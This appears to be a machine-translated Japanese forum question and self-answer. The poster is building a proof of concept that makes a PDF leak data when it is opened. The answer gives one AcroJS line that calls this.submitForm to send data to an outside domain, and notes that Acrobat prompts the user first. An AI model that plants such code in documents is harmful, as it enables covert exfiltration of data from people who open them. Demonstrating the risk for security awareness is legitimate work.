私は現在、未知のPDFファイルを開く危険性を示す必要があるセキュリティプルーフオブコンセプトに取り組んでいます。インターネットによると、多くのマルウェアはPDFドキュメント(AcroJS)のJavascriptを使用して、悪意のあるペイロードをダウンロードしています。
私のPoCは、PDFファイルのオープンに基づいてデータリークを示す被害者に基づいています。ファイル名をインターネット経由で送信するだけです(開始するには)。
ドキュメントを開くときに起動するJavaScriptコードを記述できますが、Net.HTTP.request関数は信頼できるコンテキストでのみ使用できます。
リスニングしている「邪悪な」ウェブサイトにGETリクエストを送信する方法がわかりません。ハッカーがAcrobatの脆弱性を悪用して悪用することもあると私は読んだが、多くの場所で、GETリクエストを許可するAcroJSのネイティブ機能について話されている。
一方向のGETリクエストを実行する方法を知っている人はいますか(この場合、サーバーの応答は興味深いものではありません)。
多分リモート(存在しない)画像を含める方法があるので、PDFは指定されたURLにGETリクエストを行います。またはこのようなもの。
ありがとう
さて、私は使用して方法を見つけます:
this.submitForm("http://mydomain.fr/var="+thedataIwant);
ユーザーはHTTP接続の暫定についてプロンプトが表示されますが、これは私がテストしたい警戒です。
この男の記事は私に大いに役立ちます: https://acrobatusers.com/tutorials/author/parker